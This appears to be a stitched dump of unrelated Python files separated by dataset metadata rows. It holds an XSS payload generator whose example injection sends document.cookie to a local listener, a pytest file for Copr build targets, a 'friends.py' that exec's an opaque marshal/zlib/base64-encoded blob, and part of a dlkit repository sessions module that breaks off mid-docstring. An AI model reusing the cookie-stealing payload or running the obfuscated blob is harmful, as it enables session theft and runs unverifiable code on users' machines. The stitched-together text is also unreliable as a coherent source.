                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         '/>"
# An example injection:
# fetch('http://localhost:8000?cookie='.concat(document.cookie))
injection = sys.stdin.read();
print(badString.format(quote_plus(injection)));
| 5,990.090909
| 65,670
| 0.998634
| 48
| 65,891
| 1,370.8125
| 0.791667
| 0.000274
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.000243
| 0.000425
| 65,891
| 10
| 65,671
| 6,589.1
| 0.998785
| 0.001305
| 0
| 0
| 0
| 0.2
| 0.997781
| 0.997584
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.4
| 0
| 0.4
| 0.2
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
52ac34f0094ea596af1cc3f9510e1b6c2784efe5
| 121
|
py
|
Python
|
src/omk_core/utils/__init__.py
|
adammichaelwood/omk_core
|
9f3a845aeadad0b1de91d7f20da3ae6b686a07d0
|
[
"MIT"
] | null | null | null |
src/omk_core/utils/__init__.py
|
adammichaelwood/omk_core
|
9f3a845aeadad0b1de91d7f20da3ae6b686a07d0
|
[
"MIT"
] | null | null | null |
src/omk_core/utils/__init__.py
|
adammichaelwood/omk_core
|
9f3a845aeadad0b1de91d7f20da3ae6b686a07d0
|
[
"MIT"
] | null | null | null |
from .mus_utils import *
from .py_utils import *
from .method_dispatch import methoddispatch
from .m21_utils import play
| 24.2
| 43
| 0.818182
| 18
| 121
| 5.277778
| 0.555556
| 0.347368
| 0.315789
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019048
| 0.132231
| 121
| 4
| 44
| 30.25
| 0.885714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
52c4cfde8a4f841b85a53700c7687ffed81c1af0
| 9,227
|
py
|
Python
|
tests/unit/test_build_helper.py
|
FalseG0d/packit-service
|
03f840cdfbcc129582a2ec2a20f069c85fea0c56
|
[
"MIT"
] | 1
|
2020-03-28T13:57:08.000Z
|
2020-03-28T13:57:08.000Z
|
tests/unit/test_build_helper.py
|
FalseG0d/packit-service
|
03f840cdfbcc129582a2ec2a20f069c85fea0c56
|
[
"MIT"
] | null | null | null |
tests/unit/test_build_helper.py
|
FalseG0d/packit-service
|
03f840cdfbcc129582a2ec2a20f069c85fea0c56
|
[
"MIT"
] | null | null | null |
import pytest
from flexmock import flexmock
from packit.config import PackageConfig, JobConfig, JobType, JobConfigTriggerType
from packit_service.service.events import TheJobTriggerType
from packit_service.worker.build.copr_build import CoprBuildJobHelper
@pytest.mark.parametrize(
"jobs,trigger,build_targets,test_targets",
[
pytest.param(
[
JobConfig(
type=JobType.copr_build,
trigger=JobConfigTriggerType.pull_request,
metadata={"targets": ["fedora-29", "fedora-31"]},
)
],
TheJobTriggerType.pull_request,
{"fedora-29-x86_64", "fedora-31-x86_64"},
set(),
id="build_with_targets",
),
pytest.param(
[
JobConfig(
type=JobType.copr_build,
trigger=JobConfigTriggerType.pull_request,
metadata={"targets": ["fedora-29", "fedora-31"]},
)
],
TheJobTriggerType.pr_comment,
{"fedora-29-x86_64", "fedora-31-x86_64"},
set(),
id="build_with_targets&pr_comment",
),
pytest.param(
[
JobConfig(
type=JobType.copr_build,
trigger=JobConfigTriggerType.release,
metadata={"targets": ["fedora-29", "fedora-31"]},
)
],
TheJobTriggerType.release,
{"fedora-29-x86_64", "fedora-31-x86_64"},
set(),
id="build_with_targets&release",
),
pytest.param(
[
JobConfig(
type=JobType.copr_build,
trigger=JobConfigTriggerType.commit,
metadata={"targets": ["fedora-29", "fedora-31"]},
)
],
TheJobTriggerType.push,
{"fedora-29-x86_64", "fedora-31-x86_64"},
set(),
id="build_with_targets&push",
),
pytest.param(
[
JobConfig(
type=JobType.copr_build,
trigger=JobConfigTriggerType.pull_request,
metadata={"targets": ["fedora-29", "fedora-31"]},
),
JobConfig(
type=JobType.copr_build,
trigger=JobConfigTriggerType.commit,
metadata={"targets": ["different", "os", "target"]},
),
],
TheJobTriggerType.pull_request,
{"fedora-29-x86_64", "fedora-31-x86_64"},
set(),
id="build_with_targets&pull_request_with_pr_and_push_defined",
),
pytest.param(
[
JobConfig(
type=JobType.copr_build,
trigger=JobConfigTriggerType.pull_request,
metadata={"targets": ["fedora-29", "fedora-31"]},
),
JobConfig(
type=JobType.copr_build,
trigger=JobConfigTriggerType.commit,
metadata={"targets": ["different", "os", "target"]},
),
],
TheJobTriggerType.pr_comment,
{"fedora-29-x86_64", "fedora-31-x86_64"},
set(),
id="build_with_targets&pr_comment_with_pr_and_push_defined",
),
pytest.param(
[
JobConfig(
type=JobType.copr_build,
trigger=JobConfigTriggerType.pull_request,
metadata={"targets": ["different", "os", "target"]},
),
JobConfig(
type=JobType.copr_build,
trigger=JobConfigTriggerType.commit,
metadata={"targets": ["fedora-29", "fedora-31"]},
),
],
TheJobTriggerType.push,
{"fedora-29-x86_64", "fedora-31-x86_64"},
set(),
id="build_with_targets&push_with_pr_and_push_defined",
),
pytest.param(
[
JobConfig(
type=JobType.copr_build,
trigger=JobConfigTriggerType.pull_request,
metadata={},
)
],
TheJobTriggerType.pull_request,
{"fedora-30-x86_64", "fedora-31-x86_64"},
set(),
id="build_without_targets",
),
pytest.param(
[
JobConfig(
type=JobType.tests,
trigger=JobConfigTriggerType.pull_request,
metadata={},
)
],
TheJobTriggerType.pull_request,
{"fedora-30-x86_64", "fedora-31-x86_64"},
{"fedora-30-x86_64", "fedora-31-x86_64"},
id="test_without_targets",
),
pytest.param(
[
JobConfig(
type=JobType.tests,
trigger=JobConfigTriggerType.pull_request,
metadata={"targets": ["fedora-29", "fedora-31"]},
)
],
TheJobTriggerType.pull_request,
{"fedora-29-x86_64", "fedora-31-x86_64"},
{"fedora-29-x86_64", "fedora-31-x86_64"},
id="test_with_targets",
),
pytest.param(
[
JobConfig(
type=JobType.copr_build,
trigger=JobConfigTriggerType.pull_request,
metadata={},
),
JobConfig(
type=JobType.tests,
trigger=JobConfigTriggerType.pull_request,
metadata={},
),
],
TheJobTriggerType.pull_request,
{"fedora-30-x86_64", "fedora-31-x86_64"},
{"fedora-30-x86_64", "fedora-31-x86_64"},
id="build_without_target&test_without_targets",
),
pytest.param(
[
JobConfig(
type=JobType.copr_build,
trigger=JobConfigTriggerType.pull_request,
metadata={"targets": ["fedora-29", "fedora-31"]},
),
JobConfig(
type=JobType.tests,
trigger=JobConfigTriggerType.pull_request,
metadata={},
),
],
TheJobTriggerType.pull_request,
{"fedora-29-x86_64", "fedora-31-x86_64"},
{"fedora-29-x86_64", "fedora-31-x86_64"},
id="build_with_target&test_without_targets",
),
pytest.param(
[
JobConfig(
type=JobType.copr_build,
trigger=JobConfigTriggerType.pull_request,
metadata={},
),
JobConfig(
type=JobType.tests,
trigger=JobConfigTriggerType.pull_request,
metadata={"targets": ["fedora-29", "fedora-31"]},
),
],
TheJobTriggerType.pull_request,
{"fedora-29-x86_64", "fedora-31-x86_64"},
{"fedora-29-x86_64", "fedora-31-x86_64"},
id="build_without_target&test_with_targets",
),
pytest.param(
[
JobConfig(
type=JobType.copr_build,
trigger=JobConfigTriggerType.pull_request,
metadata={},
),
JobConfig(
type=JobType.tests,
trigger=JobConfigTriggerType.pull_request,
metadata={"targets": "fedora-29"},
),
],
TheJobTriggerType.pull_request,
{"fedora-29-x86_64"},
{"fedora-29-x86_64"},
id="build_without_target&test_with_one_str_target",
),
pytest.param(
[
JobConfig(
type=JobType.build,
trigger=JobConfigTriggerType.pull_request,
metadata={},
),
JobConfig(
type=JobType.tests,
trigger=JobConfigTriggerType.pull_request,
metadata={"targets": "fedora-29"},
),
],
TheJobTriggerType.pull_request,
{"fedora-29-x86_64"},
{"fedora-29-x86_64"},
id="build_with_mixed_build_alias",
),
],
)
def test_targets(jobs, trigger, build_targets, test_targets):
copr_build_handler = CoprBuildJobHelper(
config=flexmock(),
package_config=PackageConfig(jobs=jobs),
project=flexmock(),
event=flexmock(trigger=trigger),
)
assert copr_build_handler.package_config.jobs
assert [j.type for j in copr_build_handler.package_config.jobs]
assert set(copr_build_handler.build_chroots) == build_targets
assert set(copr_build_handler.tests_chroots) == test_targets
| 35.217557
| 81
| 0.47426
| 727
| 9,227
| 5.78542
| 0.086658
| 0.047551
| 0.065383
| 0.162625
| 0.879933
| 0.856158
| 0.841655
| 0.811698
| 0.805754
| 0.784831
| 0
| 0.052798
| 0.417037
| 9,227
| 261
| 82
| 35.35249
| 0.729132
| 0
| 0
| 0.765625
| 0
| 0
| 0.16636
| 0.052672
| 0
| 0
| 0
| 0
| 0.015625
| 1
| 0.003906
| false
| 0
| 0.019531
| 0
| 0.023438
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
52de90a582358c268c4a4618c75e0bc64823cbff
| 1,985
|
py
|
Python
|
src/friends.py
|
Maaadd/mbf
|
c4ebf2a2719d6c35e1aa26be83f42230e43670bc
|
[
"BSD-3-Clause"
] | null | null | null |
src/friends.py
|
Maaadd/mbf
|
c4ebf2a2719d6c35e1aa26be83f42230e43670bc
|
[
"BSD-3-Clause"
] | null | null | null |
src/friends.py
|
Maaadd/mbf
|
c4ebf2a2719d6c35e1aa26be83f42230e43670bc
|
[
"BSD-3-Clause"
] | null | null | null |
import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b64decode("eJyNVVtvG1UQnrN27NyTpo1dN71sCqkMJXZvCjSQBkFQk97lFKUKqcLG56y9zl6cPWcbW3WeggTiX/DAAz+CF175JfwKmJldt4oQErZ3PGfOzJxvbmebkH0sfL7ER79GIvEnwAfYfccL2BVD3oJda8jnYDfHvAV+HoIR2C2AoHUO/CIERdgt4joPP6CzUbLYro7gCd7f+HlWFciaKSRfKScxnpv421HSTcWjBMQxyniBauZxcQ6fIj5fE8xrOVRhCKcCTvLQX4FBHjqCgKAEj6/QIs+LEaicjPC+BYMRkAU4tchoJ6xC3uTgcBxiH4QQBlVwv0hWwhRAjjIXCnhlitDBAMbIDVkXIJOMDyVFMLhbyE48tCD+gyXFs5L3Xu+fNchB/BfICZIQ4rKchDIeE86xsHhG2AI4wbOn4OFm7xdhEP9vVv9EDHLQmSA8A0GQOpMgpzlBY5TmwRjIGYY6Dr2KGIxDZxrkLMhzcApi4/WIOEHjCejMgJxjM7Q/D2YWBpO0PCyAfi6Qx/pSMD+Jo+f0SxU6c+/PI9spkBfO2MZ/iixl8ySUJagQlmkIS8Ncls9uUHqms3LSgfPWYBQ658GzSE75kBdhZYAnVWCFU4pNcQE689ApgbwEuGPK0LmI4UGnAnKBfJFTLoCbgxLXObW4RFoUzo68zLjHh7h/tgYWLdO8yCuACqdCEM4ydhF2x4udozGRNwvcSb9a2EnyKpbmBUpf4bPTr0OvCtRdl0FeI78br8twMsOiK1zfGSgTmKPfrZ2dsEjNSF0nbWqH8sNNc5X7YpHLh+BmKURzDTp2Fg0Zk3SRw8AKbVev46A803eQji98d+vz+3eDp45ODg+d0E5i35aOa5zYNipAASvcDlb5fyWwNV0I9brHo0ik7tE1oc8jCQ4c7TVrrtNUB1F0WGtGgV5CeU+2lqOuCu22MV29Wq/3o8QktQNV33+09fJ2q/3IvXusS+/w3A6+RRja8Z32IgoC/QFupbZ79b167eP1vXoV6Ud7dTf2VCj13rqvzZqeoRtErvHejVi5yGu6VWQSdOvM1To6Cg0jpmVi3OXP9AS7D/xa14m1ig3taNP3FWN6gxKv6fjLju+1wlU78KT0FcfuML2pZykP3ThyPV/Vuu3uOh1MXuvr7+AYuqraCErTvZbhX3dRsIY3DULxJKuETqD0j8hMpbm/Eyw/GCZ/Sdv/8zOVZvLT4C3/3wuWNGXyxH6bVXy4fuSELSzzofITrLlWvtPy7LClNjBlticXa5ru26XN1aWnq0vbHOkTr+0Y+yW3xxPHC/HmonzFXtjSVSrisIpboVFx0tWe/TgJm94n9oGK2yo03iKXlcOl0mj7vdWd4Hliuon5V+Nxqo+5d3FSAWLneN8LUTMtV9f3jKG3QKy6PjYgXn0AW6FUvW/iOIoNtW2kU6h9jb3Np6seWllsxcauF0rH97kgPiIlnZdxosxE1oENdZQobdiPCpuRVMxmjTOaudgnH/lswc4wPSx4FoWKGaN6qReni5ORKfUzgEZGWVzHsWdUg4eNNMLomA9Bdy69/1jH9RPdNvQWfKz6B5ETS048Zj7NiO+hQy9m17EKojcpAppIZngkhmOimWv6kVZVcska2BYumzdxrD2V9mvsZ6LQ9VoZEC9LjYyCYWNEXE4Gsp/xFo8pBxIr3Y1CnSKiGeQy9xqXh2XGV7+/TzPRGB2+/GnKSJJCc94oajpgoslkOwmcOLa3NliBgHDKvicFMSlywhYlMYXfaWtOzFkfIjcn5q05qyBGxBjuL4gZUcHnqihYF3GvYpWQXkfbG+IccjbqTWW6JdTMQR75GeSrdH6D8ta4QGSRyM1h9Q70vQaBaFwiQoE21obI/zMGwv5FEMnEVw84YErqLTErZq1/AJ3x+00="))))
| 992.5
| 1,958
| 0.960705
| 68
| 1,985
| 28.044118
| 0.955882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.154312
| 0.001008
| 1,985
| 2
| 1,958
| 992.5
| 0.807363
| 0
| 0
| 0
| 0
| 0.5
| 0.956697
| 0.956697
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
52f4d01dc4e36d96fda86ee2c67f6b947dbde1a2
| 128,315
|
py
|
Python
|
dlkit/aws_adapter/repository/sessions.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 2
|
2018-02-23T12:16:11.000Z
|
2020-10-08T17:54:24.000Z
|
dlkit/aws_adapter/repository/sessions.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 87
|
2017-04-21T18:57:15.000Z
|
2021-12-13T19:43:57.000Z
|
dlkit/aws_adapter/repository/sessions.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 1
|
2018-03-01T16:44:25.000Z
|
2018-03-01T16:44:25.000Z
|
"""repository.sessions"""
# pylint: disable=too-many-lines,no-member,protected-access,too-many-public-methods
from ...abstract_osid.repository import sessions as abc_repository_sessions
from ..osid import sessions as osid_sessions
from .objects import Asset, AssetList, AssetContent, AssetContentList, AssetContentForm
from ..types import AWS_ASSET_CONTENT_RECORD_TYPE
from ..osid.osid_errors import NotFound, PermissionDenied, Unimplemented
from ..primitives import Id
from .aws_utils import remove_file
from ...json_ import utilities
class AssetLookupSession(abc_repository_sessions.AssetLookupSession,
osid_sessions.OsidSession):
"""This session defines methods for retrieving assets.
An ``Asset`` represents an element of content stored in a
Repository.
This lookup session defines several views:
* comparative view: elements may be silently omitted or re-ordered
* plenary view: provides a complete result set or is an error
condition
* isolated repository view: All asset methods in this session
operate, retrieve and pertain to assets defined explicitly in
the current repository. Using an isolated view is useful for
managing ``Assets`` with the ``AssetAdminSession.``
* federated repository view: All asset methods in this session
operate, retrieve and pertain to all assets defined in this
repository and any other assets implicitly available in this
repository through repository inheritence.
The methods ``use_federated_repository_view()`` and
``use_isolated_repository_view()`` behave as a radio group and one
should be selected before invoking any lookup methods.
Assets may have an additional records indicated by their respective
record types. The record may not be accessed through a cast of the
``Asset``.
"""
def get_repository_id(self):
"""Gets the ``Repository`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Repository Id`` associated with
this session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_repository_id()
repository_id = property(fget=get_repository_id)
def get_repository(self):
"""Gets the ``Repository`` associated with this session.
return: (osid.repository.Repository) - the ``Repository``
associated with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
return self._provider_session.get_repository()
repository = property(fget=get_repository)
def can_lookup_assets(self):
"""Tests if this user can perform ``Asset`` lookups.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations.
return: (boolean) - ``false`` if lookup methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.can_lookup_resources_template
return self._provider_session.can_lookup_assets()
def use_comparative_asset_view(self):
"""The returns from the lookup methods may omit or translate elements
based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.use_comparative_resource_view_template
self._provider_session.use_comparative_asset_view()
def use_plenary_asset_view(self):
"""A complete view of the ``Asset`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.use_plenary_resource_view_template
self._provider_session.use_plenary_asset_view()
def use_federated_repository_view(self):
"""Federates the view for methods in this session.
A federated view will include assets in repositories which are
children of this repository in the repository hierarchy.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.use_federated_bin_view_template
self._provider_session.use_federated_repository_view()
def use_isolated_repository_view(self):
"""Isolates the view for methods in this session.
An isolated view restricts lookups to this repository only.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.use_isolated_bin_view_template
self._provider_session.use_isolated_repository_view()
def get_asset(self, asset_id=None):
"""Gets the ``Asset`` specified by its ``Id``.
In plenary mode, the exact ``Id`` is found or a ``NotFound``
results. Otherwise, the returned ``Asset`` may have a different
``Id`` than requested, such as the case where a duplicate ``Id``
was assigned to an ``Asset`` and retained for compatibility.
arg: asset_id (osid.id.Id): the ``Id`` of the ``Asset`` to
retrieve
return: (osid.repository.Asset) - the returned ``Asset``
raise: NotFound - no ``Asset`` found with the given ``Id``
raise: NullArgument - ``asset_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return Asset(self._provider_session.get_asset(asset_id), self._config_map)
# def get_asset_content(self, asset_content_id=None):
# """Gets the ``AssetContent`` specified by its ``Id``.
#
# In plenary mode, the exact ``Id`` is found or a ``NotFound``
# results. Otherwise, the returned ``Asset`` may have a different
# ``Id`` than requested, such as the case where a duplicate ``Id``
# was assigned to an ``Asset`` and retained for compatibility.
#
# arg: asset_id (osid.id.Id): the ``Id`` of the ``Asset`` to
# retrieve
# return: (osid.repository.Asset) - the returned ``Asset``
# raise: NotFound - no ``Asset`` found with the given ``Id``
# raise: NullArgument - ``asset_id`` is ``null``
# raise: OperationFailed - unable to complete request
# raise: PermissionDenied - authorization failure
# *compliance: mandatory -- This method must be implemented.*
#
# """
# return AssetContent(self._provider_session.get_asset_content(asset_content_id), self._config_map)
def get_assets_by_ids(self, asset_ids=None):
"""Gets an ``AssetList`` corresponding to the given ``IdList``.
In plenary mode, the returned list contains all of the assets
specified in the ``Id`` list, in the order of the list,
including duplicates, or an error results if an ``Id`` in the
supplied list is not found or inaccessible. Otherwise,
inaccessible ``Assets`` may be omitted from the list and may
present the elements in any order including returning a unique
set.
arg: asset_ids (osid.id.IdList): the list of ``Ids`` to
retrieve
return: (osid.repository.AssetList) - the returned ``Asset
list``
raise: NotFound - an ``Id`` was not found
raise: NullArgument - ``asset_ids`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return AssetList(self._provider_session.get_assets_by_ids(asset_ids),
self._config_map)
def get_assets_by_genus_type(self, asset_genus_type=None):
"""Gets an ``AssetList`` corresponding to the given asset genus ``Type``
which does not include assets of types derived from the specified ``Type``.
In plenary mode, the returned list contains all known assets or
an error results. Otherwise, the returned list may contain only
those assets that are accessible through this session.
arg: asset_genus_type (osid.type.Type): an asset genus type
return: (osid.repository.AssetList) - the returned ``Asset
list``
raise: NullArgument - ``asset_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return AssetList(self._provider_session.get_assets_by_genus_type(asset_genus_type),
self._config_map)
def get_assets_by_parent_genus_type(self, asset_genus_type=None):
"""Gets an ``AssetList`` corresponding to the given asset genus ``Type``
and include any additional assets with genus types derived from the specified
``Type``.
In plenary mode, the returned list contains all known assets or
an error results. Otherwise, the returned list may contain only
those assets that are accessible through this session.
arg: asset_genus_type (osid.type.Type): an asset genus type
return: (osid.repository.AssetList) - the returned ``Asset
list``
raise: NullArgument - ``asset_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return AssetList(self._provider_session.get_assets_by_parent_genus_type(asset_genus_type),
self._config_map)
def get_assets_by_record_type(self, asset_record_type=None):
"""Gets an ``AssetList`` containing the given asset record ``Type``.
In plenary mode, the returned list contains all known assets or
an error results. Otherwise, the returned list may contain only
those assets that are accessible through this session.
arg: asset_record_type (osid.type.Type): an asset record type
return: (osid.repository.AssetList) - the returned ``Asset
list``
raise: NullArgument - ``asset_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return AssetList(self._provider_session.get_assets_by_record_type(asset_record_type),
self._config_map)
def get_assets_by_provider(self, resource_id=None):
"""Gets an ``AssetList`` from the given provider.
In plenary mode, the returned list contains all known assets or
an error results. Otherwise, the returned list may contain only
those assets that are accessible through this session.
arg: resource_id (osid.id.Id): a resource ``Id``
return: (osid.repository.AssetList) - the returned ``Asset
list``
raise: NullArgument - ``resource_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return AssetList(self._provider_session.get_assets_by_provider(resource_id),
self._config_map)
def get_assets(self):
"""Gets all ``Assets``.
In plenary mode, the returned list contains all known assets or
an error results. Otherwise, the returned list may contain only
those assets that are accessible through this session.
return: (osid.repository.AssetList) - a list of ``Assets``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return AssetList(self._provider_session.get_assets(), self._config_map)
assets = property(fget=get_assets)
class AssetContentLookupSession(abc_repository_sessions.AssetContentLookupSession, osid_sessions.OsidSession):
"""This session defines methods for retrieving asset contents.
An ``AssetContent`` represents an element of content stored associated
with an ``Asset``.
This lookup session defines several views:
* comparative view: elements may be silently omitted or re-ordered
